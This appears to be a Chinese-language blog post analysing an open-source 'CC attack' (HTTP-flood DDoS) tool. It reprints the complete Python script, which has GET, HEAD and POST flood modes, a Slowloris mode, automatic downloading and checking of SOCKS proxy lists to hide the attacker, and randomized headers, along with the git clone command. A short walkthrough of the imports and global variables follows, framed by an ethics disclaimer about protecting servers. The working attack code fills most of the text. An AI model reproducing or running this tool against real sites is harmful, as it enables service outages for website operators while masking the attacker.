一篇CC攻擊腳本分析
聲明
本篇分析由阿維撰寫,特此感謝推薦我資安書籍的王教授,陪我進行測試的蕉蕉,與陪我聊天的小李。
本篇文章的研究目的是為了保護網站主機,而對於攻擊手法進行分析。不能,也不應該使用本篇文章的知識進行非法與惱人的用途。閱讀本篇文章並有所啟發者,應該要對其他人類同胞懷愛心,並且堅守道德,絕對不進行任何惡作劇乃至惡意的網路攻擊行為。甚至面對難以相處的人類同胞時,懷抱耐心與溫和。
目錄
什麼是CC攻擊
一個網頁伺服器,每次有人瀏覽網站時,都要使用一定的資源進行回應。
而如果一下子湧入許多的網站請求,超過伺服器負荷,則網站會暫時無法回應更多請求。
同時從許多不同主機發出大量請求,稱為DDos攻擊,但是缺點是,伺服器可以拒絕響應這些參與的主機IP。
CC攻擊則是藉由網路上頭免費的proxy,進行IP位置的跳轉,來掩蔽攻擊方的IP,並且讓伺服器難以針對特定IP封鎖。
本篇研究的CC攻擊腳本
本篇CC-attack腳本由Leeon123發布在github上頭。
特此對作者Leeon123進行感謝。
基於授權為GPLv2,因此受作者同意得以進行轉發與公開。
CC-attack:
https://github.com/Leeon123/CC-attack
如要取得腳本可採取以下指令:
git clone https://github.com/Leeon123/CC-attack.git
CC攻擊腳本全文
跳過全文,看後面的分析
cc.py
#!/usr/bin/python3
#Coded by L330n123
#########################################
# Just a little change #
# -- L330n123 #
#########################################
import requests
import socket
import socks
import time
import random
import threading
import sys
import ssl
import datetime
print ('''
///// ///// /////////////
CCCCC/ CCCCC/ | CC-attack |/
CC/ CC/ |-----------|/
CC/ CC/ | Layer 7 |/
CC///// CC///// | ddos tool |/
CCCCC/ CCCCC/ |___________|/
>--------------------------------------------->
Version 3.6 (2020/12/19)
C0d3d by L330n123
┌─────────────────────────────────────────────┐
│ Tos: Don't attack .gov website │
├─────────────────────────────────────────────┤
│ New stuff: │
│ [+] Optimization │
│ [+] Changed Output │
│ [+] Added Url Parser │
├─────────────────────────────────────────────┤
│ Link: https://github.com/Leeon123/CC-attack │
└─────────────────────────────────────────────┘''')
acceptall = [
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept-Encoding: gzip, deflate\r\n",
"Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n",
"Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n",
"Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n,"
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xhtml+xml",
"Accept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n",
"Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",]
referers = [
"https://www.google.com/search?q=",
"https://check-host.net/",
"https://www.facebook.com/",
"https://www.youtube.com/",
"https://www.fbi.com/",
"https://www.bing.com/search?q=",
"https://r.search.yahoo.com/",
"https://www.cia.gov/index.html",
"https://vk.com/profile.php?redirect=",
"https://www.usatoday.com/search/results?q=",
"https://help.baidu.com/searchResult?keywords=",
"https://steamcommunity.com/market/search?q=",
"https://www.ted.com/search?q=",
"https://play.google.com/store/search?q=",
"https://www.qwant.com/search?q=",
"https://soda.demo.socrata.com/resource/4tka-6guv.json?$q=",
"https://www.google.ad/search?q=",
"https://www.google.ae/search?q=",
"https://www.google.com.af/search?q=",
"https://www.google.com.ag/search?q=",
"https://www.google.com.ai/search?q=",
"https://www.google.al/search?q=",
"https://www.google.am/search?q=",
"https://www.google.co.ao/search?q=",
]
ind_dict = {}
data = ""
cookies = ""
strings = "asdfghjklqwertyuiopZXCVBNMQWERTYUIOPASDFGHJKLzxcvbnm1234567890&"
###################################################
Intn = random.randint
Choice = random.choice
###################################################
def build_threads(mode,thread_num,event,socks_type,ind_rlock):
if mode == "post":
for _ in range(thread_num):
th = threading.Thread(target = post,args=(event,socks_type,ind_rlock,))
th.setDaemon(True)
th.start()
elif mode == "cc":
for _ in range(thread_num):
th = threading.Thread(target = cc,args=(event,socks_type,ind_rlock,))
th.setDaemon(True)
th.start()
elif mode == "head":
for _ in range(thread_num):
th = threading.Thread(target = head,args=(event,socks_type,ind_rlock,))
th.setDaemon(True)
th.start()
def getuseragent():
platform = Choice(['Macintosh', 'Windows', 'X11'])
if platform == 'Macintosh':
os = Choice(['68K', 'PPC', 'Intel Mac OS X'])
elif platform == 'Windows':
os = Choice(['Win3.11', 'WinNT3.51', 'WinNT4.0', 'Windows NT 5.0', 'Windows NT 5.1', 'Windows NT 5.2', 'Windows NT 6.0', 'Windows NT 6.1', 'Windows NT 6.2', 'Win 9x 4.90', 'WindowsCE', 'Windows XP', 'Windows 7', 'Windows 8', 'Windows NT 10.0; Win64; x64'])
elif platform == 'X11':
os = Choice(['Linux i686', 'Linux x86_64'])
browser = Choice(['chrome', 'firefox', 'ie'])
if browser == 'chrome':
webkit = str(Intn(500, 599))
version = str(Intn(0, 99)) + '.0' + str(Intn(0, 9999)) + '.' + str(Intn(0, 999))
return 'Mozilla/5.0 (' + os + ') AppleWebKit/' + webkit + '.0 (KHTML, like Gecko) Chrome/' + version + ' Safari/' + webkit
elif browser == 'firefox':
currentYear = datetime.date.today().year
year = str(Intn(2020, currentYear))
month = Intn(1, 12)
if month < 10:
month = '0' + str(month)
else:
month = str(month)
day = Intn(1, 30)
if day < 10:
day = '0' + str(day)
else:
day = str(day)
gecko = year + month + day
version = str(Intn(1, 72)) + '.0'
return 'Mozilla/5.0 (' + os + '; rv:' + version + ') Gecko/' + gecko + ' Firefox/' + version
elif browser == 'ie':
version = str(Intn(1, 99)) + '.0'
engine = str(Intn(1, 99)) + '.0'
option = Choice([True, False])
if option == True:
token = Choice(['.NET CLR', 'SV1', 'Tablet PC', 'Win64; IA64', 'Win64; x64', 'WOW64']) + '; '
else:
token = ''
return 'Mozilla/5.0 (compatible; MSIE ' + version + '; ' + os + '; ' + token + 'Trident/' + engine + ')'
def randomurl():
return str(Choice(strings)+str(Intn(0,271400281257))+Choice(strings)+str(Intn(0,271004281257))+Choice(strings) + Choice(strings)+str(Intn(0,271400281257))+Choice(strings)+str(Intn(0,271004281257))+Choice(strings))
def GenReqHeader(method):
global data
header = ""
if method == "get" or method == "head":
connection = "Connection: Keep-Alive\r\n"
if cookies != "":
connection += "Cookies: "+str(cookies)+"\r\n"
accept = Choice(acceptall)
referer = "Referer: "+Choice(referers)+ target + path + "\r\n"
useragent = "User-Agent: " + getuseragent() + "\r\n"
header = referer + useragent + accept + connection + "\r\n"
elif method == "post":
post_host = "POST " + path + " HTTP/1.1\r\nHost: " + target + "\r\n"
content = "Content-Type: application/x-www-form-urlencoded\r\nX-requested-with:XMLHttpRequest\r\n"
refer = "Referer: http://"+ target + path + "\r\n"
user_agent = "User-Agent: " + getuseragent() + "\r\n"
accept = Choice(acceptall)
if mode2 != "y":# You can enable customize data
data = str(random._urandom(16))
length = "Content-Length: "+str(len(data))+" \r\nConnection: Keep-Alive\r\n"
if cookies != "":
length += "Cookies: "+str(cookies)+"\r\n"
header = post_host + accept + refer + content + user_agent + length + "\n" + data + "\r\n\r\n"
return header
def ParseUrl(original_url):
global target
global path
global port
global protocol
original_url = original_url.strip()
url = ""
path = "/"#default value
port = 80 #default value
protocol = "http"
#http(s)://www.example.com:1337/xxx
if original_url[:7] == "http://":
url = original_url[7:]
elif original_url[:8] == "https://":
url = original_url[8:]
protocol = "https"
#http(s)://www.example.com:1337/xxx ==> www.example.com:1337/xxx
#print(url) #for debug
tmp = url.split("/")
website = tmp[0]#www.example.com:1337/xxx ==> www.example.com:1337
check = website.split(":")
if len(check) != 1:#detect the port
port = int(check[1])
else:
if protocol == "https":
port = 443
target = check[0]
if len(tmp) > 1:
path = url.replace(website,"",1)#get the path www.example.com/xxx ==> /xxx
def InputOption(question,options,default):
ans = ""
while ans == "":
ans = str(input(question)).strip().lower()
if ans == "":
ans = default
elif ans not in options:
print("> Please enter the correct option")
ans = ""
continue
return ans
def CheckerOption():
global proxies
N = str(input("> Do you need to get socks list?(y/n,default=y):"))
if N == 'y' or N == "" :
downloadsocks(choice)
else:
pass
if choice == "4":
out_file = str(input("> Socks4 Proxy file path(socks4.txt):"))
if out_file == '':
out_file = str("socks4.txt")
else:
out_file = str(out_file)
check_list(out_file)
proxies = open(out_file).readlines()
elif choice == "5":
out_file = str(input("> Socks5 Proxy file path(socks5.txt):"))
if out_file == '':
out_file = str("socks5.txt")
else:
out_file = str(out_file)
check_list(out_file)
proxies = open(out_file).readlines()
if len(proxies) == 0:
print("> There are no more proxies. Please download a new one.")
sys.exit(1)
print ("> Number Of Socks%s Proxies: %s" %(choice,len(proxies)))
time.sleep(0.03)
ans = str(input("> Do u need to check the socks list?(y/n, defualt=y):"))
if ans == "":
ans = "y"
if ans == "y":
ms = str(input("> Delay of socks(seconds, default=5):"))
if ms == "":
ms = int(5)
else :
try:
ms = int(ms)
except :
ms = float(ms)
check_socks(ms)
def SetupIndDict():
global ind_dict
for proxy in proxies:
ind_dict[proxy.strip()] = 0
def OutputToScreen(ind_rlock):
global ind_dict
i = 0
sp_char = ["|","/","-","\\"]
while 1:
if i > 3:
i = 0
print("{:^70}".format("Proxies attacking status"))
print("{:^70}".format("IP:PORT <-> RPS "))
#1. xxx.xxx.xxx.xxx:xxxxx ==> Rps: xxxx
ind_rlock.acquire()
top_num = 0
top10= sorted(ind_dict, key=ind_dict.get, reverse=True)
if len(top10) > 10:
top_num = 10
else:
top_num = len(top10)
for num in range(top_num):
top = "none"
rps = 0
if len(ind_dict) != 0:
top = top10[num]
rps = ind_dict[top]
ind_dict[top] = 0
print("{:^70}".format("{:2d}. {:^22s} | Rps: {:d}".format(num+1,top,rps)))
total = 0
for k,v in ind_dict.items():
total = total + v
ind_dict[k] = 0
ind_rlock.release()
print("{:^70}".format(" ["+sp_char[i]+"] CC attack | Total Rps:"+str(total)))
i+=1
time.sleep(1)
print("\n"*100)
def cc(event,socks_type,ind_rlock):
global ind_dict
header = GenReqHeader("get")
proxy = Choice(proxies).strip().split(":")
add = "?"
if "?" in path:
add = "&"
event.wait()
while True:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if brute:
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
try:
for n in range(multiple+1):
get_host = "GET " + path + add + randomurl() + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = get_host + header
sent = s.send(str.encode(request))
if not sent:
ind_rlock.acquire()
ind_dict[(proxy[0]+":"+proxy[1]).strip()] += n
ind_rlock.release()
proxy = Choice(proxies).strip().split(":")
break
s.close()
except:
s.close()
ind_rlock.acquire()
ind_dict[(proxy[0]+":"+proxy[1]).strip()] += multiple+1
ind_rlock.release()
except:
s.close()
def head(event,socks_type,ind_rlock):#HEAD MODE
global ind_dict
header = GenReqHeader("head")
proxy = Choice(proxies).strip().split(":")
add = "?"
if "?" in path:
add = "&"
event.wait()
while True:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if brute:
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
try:
for n in range(multiple+1):
head_host = "HEAD " + path + add + randomurl() + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = head_host + header
sent = s.send(str.encode(request))
if not sent:
ind_rlock.acquire()
ind_dict[(proxy[0]+":"+proxy[1]).strip()] += n
ind_rlock.release()
proxy = Choice(proxies).strip().split(":")
break# This part will jump to dirty fix
s.close()
except:
s.close()
ind_rlock.acquire()
ind_dict[(proxy[0]+":"+proxy[1]).strip()] += multiple+1
ind_rlock.release()
except:#dirty fix
s.close()
def post(event,socks_type,ind_rlock):
global ind_dict
request = GenReqHeader("post")
proxy = Choice(proxies).strip().split(":")
event.wait()
while True:
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if brute:
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
try:
for n in range(multiple+1):
sent = s.send(str.encode(request))
if not sent:
ind_rlock.acquire()
ind_dict[(proxy[0]+":"+proxy[1]).strip()] += n
ind_rlock.release()
proxy = Choice(proxies).strip().split(":")
break
s.close()
except:
s.close()
ind_rlock.acquire()
ind_dict[(proxy[0]+":"+proxy[1]).strip()] += multiple+1
ind_rlock.release()
except:
s.close()
socket_list=[]
def slow(conn,socks_type):
proxy = Choice(proxies).strip().split(":")
for _ in range(conn):
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
s.settimeout(1)
s.connect((str(target), int(port)))
if str(port) == '443':
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
s.send("GET /?{} HTTP/1.1\r\n".format(Intn(0, 2000)).encode("utf-8"))# Slowloris format header
s.send("User-Agent: {}\r\n".format(getuseragent()).encode("utf-8"))
s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
if cookies != "":
s.send(("Cookies: "+str(cookies)+"\r\n").encode("utf-8"))
s.send(("Connection:keep-alive").encode("utf-8"))
socket_list.append(s)
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
except:
s.close()
proxy = Choice(proxies).strip().split(":")#Only change proxy when error, increase the performance
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
while True:
for s in list(socket_list):
try:
s.send("X-a: {}\r\n".format(Intn(1, 5000)).encode("utf-8"))
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
except:
s.close()
socket_list.remove(s)
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
proxy = Choice(proxies).strip().split(":")
for _ in range(conn - len(socket_list)):
try:
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
s.settimeout(1)
s.connect((str(target), int(port)))
if int(port) == 443:
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
s.send("GET /?{} HTTP/1.1\r\n".format(Intn(0, 2000)).encode("utf-8"))# Slowloris format header
s.send("User-Agent: {}\r\n".format(getuseragent).encode("utf-8"))
s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
if cookies != "":
s.send(("Cookies: "+str(cookies)+"\r\n").encode("utf-8"))
s.send(("Connection:keep-alive").encode("utf-8"))
socket_list.append(s)
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
except:
proxy = Choice(proxies).strip().split(":")
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
pass
nums = 0
def checking(lines,socks_type,ms,rlock,):#Proxy checker coded by Leeon123
global nums
global proxies
proxy = lines.strip().split(":")
if len(proxy) != 2:
rlock.acquire()
proxies.remove(lines)
rlock.release()
return
err = 0
while True:
if err >= 3:
rlock.acquire()
proxies.remove(lines)
rlock.release()
break
try:
s = socks.socksocket()
if socks_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if socks_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
s.settimeout(ms)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=target)
sent = s.send(str.encode("GET / HTTP/1.1\r\n\r\n"))
if not sent:
err += 1
s.close()
break
except:
err +=1
nums += 1
def check_socks(ms):#Coded by Leeon123
global nums
thread_list=[]
rlock = threading.RLock()
for lines in list(proxies):
if choice == "5":
th = threading.Thread(target=checking,args=(lines,5,ms,rlock,))
th.start()
if choice == "4":
th = threading.Thread(target=checking,args=(lines,4,ms,rlock,))
th.start()
thread_list.append(th)
time.sleep(0.01)
sys.stdout.write("> Checked "+str(nums)+" proxies\r")
sys.stdout.flush()
for th in list(thread_list):
th.join()
sys.stdout.write("> Checked "+str(nums)+" proxies\r")
sys.stdout.flush()
print("\r\n> Checked all proxies, Total Worked:"+str(len(proxies)))
ans = input("> Do u want to save them in a file? (y/n, default=y)")
if ans == "y" or ans == "":
if choice == "4":
with open("socks4.txt", 'wb') as fp:
for lines in list(proxies):
fp.write(bytes(lines,encoding='utf8'))
fp.close()
print("> They are saved in socks4.txt.")
elif choice == "5":
with open("socks5.txt", 'wb') as fp:
for lines in list(proxies):
fp.write(bytes(lines,encoding='utf8'))
fp.close()
print("> They are saved in socks5.txt.")
def check_list(socks_file):
print("> Checking list")
temp = open(socks_file).readlines()
temp_list = []
for i in temp:
if i not in temp_list:
if ':' in i:
temp_list.append(i)
rfile = open(socks_file, "wb")
for i in list(temp_list):
rfile.write(bytes(i,encoding='utf-8'))
rfile.close()
def downloadsocks(choice):
if choice == "4":
f = open("socks4.txt",'wb')
try:
r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks4&country=all",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks4",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxyscan.io/download?type=socks4",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks4.txt",timeout=5)
f.write(r.content)
f.close()
except:
f.close()
try:#credit to All3xJ
r = requests.get("https://www.socks-proxy.net/",timeout=5)
part = str(r.content)
part = part.split("<tbody>")
part = part[1].split("</tbody>")
part = part[0].split("<tr><td>")
proxies = ""
for proxy in part:
proxy = proxy.split("</td><td>")
try:
proxies=proxies + proxy[0] + ":" + proxy[1] + "\n"
except:
pass
out_file = open("socks4.txt","a")
out_file.write(proxies)
out_file.close()
except:
pass
print("> Have already downloaded socks4 list as socks4.txt")
if choice == "5":
f = open("socks5.txt",'wb')
try:
r = requests.get("https://api.proxyscrape.com/v2/?request=getproxies&protocol=socks5&timeout=10000&country=all&simplified=true",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks5",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxyscan.io/download?type=socks5",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks5.txt",timeout=5)
f.write(r.content)
except:
pass
try:
r = requests.get("https://raw.githubusercontent.com/hookzof/socks5_list/master/proxy.txt",timeout=5)
f.write(r.content)
f.close()
except:
f.close()
print("> Have already downloaded socks5 list as socks5.txt")
def prevent():
if '.gov' in url :
print("> You can't attack .gov website!")
exit()
def main():
global multiple
global choice
global data
global mode2
global cookies
global brute
global url
print("> Mode: [cc/post/head/slow/check]")
mode = InputOption("> Choose Your Mode (default=cc) :",["cc","post","head","slow","check"],"cc")
url = str(input("> Input the target url:")).strip()
prevent()
ParseUrl(url)
if mode == "post":
mode2 = InputOption("> Customize post data? (y/n, default=n):",["y","n","yes","no"],"n")
if mode2 == "y":
data = open(str(input("> Input the file's path:")).strip(),"r",encoding="utf-8", errors='ignore').readlines()
data = ' '.join([str(txt) for txt in data])
choice2 = InputOption("> Customize cookies? (y/n, default=n):",["y","n","yes","no"],"n")
if choice2 == "y":
cookies = str(input("Plese input the cookies:")).strip()
choice = InputOption("> Choose your socks mode(4/5, default=5):",["4","5"],"5")
if choice == "4":
socks_type = 4
else:
socks_type = 5
if mode == "check":
CheckerOption()
print("> End of process")
return
if mode == "slow":
thread_num = str(input("> Connections(default=400):"))
else:
thread_num = str(input("> Threads(default=400):"))
if thread_num == "":
thread_num = int(400)
else:
try:
thread_num = int(thread_num)
except:
sys.exit("Error thread number")
CheckerOption()
if len(proxies) == 0:
print("> There are no more proxies. Please download a new one.")
return
ind_rlock = threading.RLock()
if mode == "slow":
input("Press Enter to continue.")
th = threading.Thread(target=slow,args=(thread_num,socks_type,))
th.setDaemon(True)
th.start()
else:
multiple = str(input("> Input the Magnification(default=100):"))
if multiple == "":
multiple = int(100)
else:
multiple = int(multiple)
brute = str(input("> Enable boost mode[beta](y/n, default=n):"))
if brute == "":
brute = False
elif brute == "y":
brute = True
elif brute == "n":
brute = False
event = threading.Event()
print("> Building threads...")
SetupIndDict()
build_threads(mode,thread_num,event,socks_type,ind_rlock)
event.clear()
input("Press Enter to continue.")
event.set()
threading.Thread(target=OutputToScreen,args=(ind_rlock,),daemon=True).start()
while True:
try:
time.sleep(0.1)
except KeyboardInterrupt:
break
if __name__ == "__main__":
main()#Coded by Leeon123
CC攻擊腳本分析
引入模塊
以下是本篇腳本引入的模塊
import requests
import socket
import socks
import time
import random
import threading
import sys
import ssl
import datetime
requests:
模塊可以發出一般的HTTP requests網頁請求,並且取回網站。底層是用socket模塊實現。
socket:
模塊進行socket連線,並且接收傳送內容。
socks:
可以賦予socket透過proxy代理伺服器傳輸的能力,來掩蔽攻擊方位置,並且透過各個不同的proxy主機發動網頁請求。
time:
可以暫停程式,或紀錄當前的時間。
random:
生成隨機數字。
threading:
多執行緒,來達到同一時間平行建立大量連線的效果。
sys:
系統函數,可以對底層作業系統進行操作,或者單純清理命令行畫面。本腳本用來輸出指令結果到畫面。
ssl:
拿來傳輸HTTPS的網站傳輸協定
datetime:
取得目前日期與時間。
全域變數
下列是本代碼使用的全域變數
1.acceptall
2.referers
3.ind_dict
4.data
5.cookies
6.strings
7.Intn
8.Choice
9.target
10.path
11.port
12.protocol
13.proxies
14.nums
15.multiple
16.mode2
17.brute
18.url
1.acceptall
Accept參數在HTTP request中的意義是,告訴網站伺服器自己可以接受的網頁的語言,圖片格式,編碼…等等。
這一類,說明自身可以接受的文章類型的。
格式通常是這樣,Accept: 內容類別/內容子類別。
例如:Accept: text/html的意義是,我可以接受的內容類別有,text文件中的html。
這種格式稱為MIME 多用途網際網路郵件擴展(Multipurpose Internet Mail Extensions)。
Text:用於標準化地表示的文本信息,文本消息可以是多種字符集和或者多種格式的;
Multipart:用於連接消息體的多個部分構成一個消息,這些部分可以是不同類型的數據;
Application:用於傳輸應用程式數據或者二進位數據;
Message:用於包裝一個E-mail消息;
Image:用於傳輸靜態圖片數據;
Audio:用於傳輸音頻或者音聲數據;
Video:用於傳輸動態影像數據,可以是與音頻編輯在一起的視頻數據格式。
(引用維基百科:網際網路郵件擴展)
acceptall = [
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept-Encoding: gzip, deflate\r\n",
...
]
2.referers
referers會記載,一個使用者是從哪個網站(例如google搜尋頁面),來到目前的這個網站的。
在這個程式裡頭提供了許多頁面
referers = [
"https://www.google.com/search?q=",
"https://check-host.net/",
"https://www.facebook.com/",
"https://www.youtube.com/",
...
]
3.ind_dict
紀錄著使用的proxy清單。
4.data
post用的隨機字串,是用bytes的形式存在的。
5.cookies
可以自訂的cookie
6.strings
裡頭裝著英文與數字,用來生成隨機字串
strings = "asdfghjklqwertyuiopZXCVBNMQWERTYUIOPASDFGHJKLzxcvbnm1234567890&"
7.Intn
裡頭裝著生成隨機整數的函數,用來生成隨機整數。
Intn = random.randint
8.Choice
這個函數可以從list裡頭,隨機挑選一個元素。
Choice = random.choice
9.target
去掉port號的攻擊目標網址
10.path
去除網址後的路徑
例如網址是www.example.com/xxx
path就是/xxx
11.port
整數port號
12.protocol
協定,http或https
13.proxies
裡頭存著proxies列表,如果使用者沒有自備proxies,就會自己下載一個,儲存為socks5.txt或socks4.txt。
端看你如何選擇。
14.nums
檢查有效的proxy的數量。
15.multiple
使者界面顯示攻擊放大器,但實則是個迴圈,決定單一次的連線到關閉連線,要發送幾次的HTTP請求,當請求數量過多時,也可能提早被proxy拒絕,或該IP被伺服器封鎖。
16.mode2
決定是否要自製post請求。
17.brute
啟動boost mode(噴射模式),這將關閉納格演算法(Nagle’s algorithm)。納格演算法啟動的時候,數據包會在緩衝區累積到一定的量之後,一口氣送出,避免許多的小封包徒增許多的header空間,也可以避免壅塞。而關閉納格算法之後,就會立即性的把封包發出,到底這是否更加的有效?仍需要實驗證明。
18.url
用戶輸入未經處理的網址。